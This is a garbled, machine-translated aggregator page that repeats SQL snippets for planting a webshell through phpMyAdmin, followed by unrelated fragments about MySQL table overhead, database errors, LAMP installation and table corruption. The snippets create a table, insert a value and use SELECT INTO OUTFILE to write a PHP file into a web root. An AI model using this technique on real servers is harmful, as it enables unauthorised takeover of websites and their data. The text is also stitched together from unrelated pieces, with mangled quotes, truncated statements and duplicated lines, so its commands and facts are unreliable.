turn from: http://kuxoo.com/phpMyAdmin/
[phpMyAdmin to take Shell backstage]
CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);
INSERT into ' MySQL '. ' Xiaoma ' (' xiaoma1 ') VALUES (' ');
Select Xiaoma1 from Xiaoma into outfile ' e:/
Obtain the webshell method summary in the phpmyadmin backgroundMethod 1:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----
Site.com/phpmyadminSite.com/sqlD:\wamp\wwwAccount number and password.Root passwordFirst KindCREATE TABLE ' mysql '. ' Darkmoon ' (' Darkmoon1 ' TEXT not NULL);INSERT into ' MySQL '. ' Darkmoon ' (' Darkmoon1 ') VALUES (' ');SELECT ' Darkmoon1 '
Method One:CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);INSERT into ' MySQL ', ' xiaoma ' (' xiaoma1 ') VALUES (' ');SELECT xiaomafrom study into OUTFILE ' e:/wamp/www/7.php ';----above at the same time, in the database: MySQL
Method One:CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);INSERT into ' MySQL ', ' xiaoma ' (' xiaoma1 ') VALUES (' ');SELECT xiaomafrom study into OUTFILE ' e:/wamp/www/7.php ';----above at the same time, in the database: MySQL
Description of overhead in phpmyadmin & nbsp; in phpmyadmin, if there is a column in The myisam table, phpmyadmin displays overhead, & nbsp; in fact, when the data in the table is deleted, some space will be retained and will not be released, which
Description of overhead in phpmyadmin & nbsp; in phpmyadmin, if there is a column in The myisam table, phpmyadmin displays overhead, & nbsp; in fact, when the data in the table is deleted, some space will be retained and will not be released, which
Recent customer problems said that the site because the database error cannot open, oneself summed up some experience, and then read the wrong information as follows : MySQL database as a good open source database version, support large data
CentOS 7.4 Source installs the latest version of Lamp architecture and build phpMyAdminThe required compression packages, such as:1. Install Apache Service[[Email protected] ~]# tar xf apr-1.6.2.tar.gz-c/opt///apache Plugin[Email protected] ~]# tar
Symptom of table corruption
A typical symptom of a damaged table is as follows:1. When selecting data from a table, you get the following error:Incorrect key file for table: ' ... '. Try to repair it2. The query cannot find rows in the table or
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.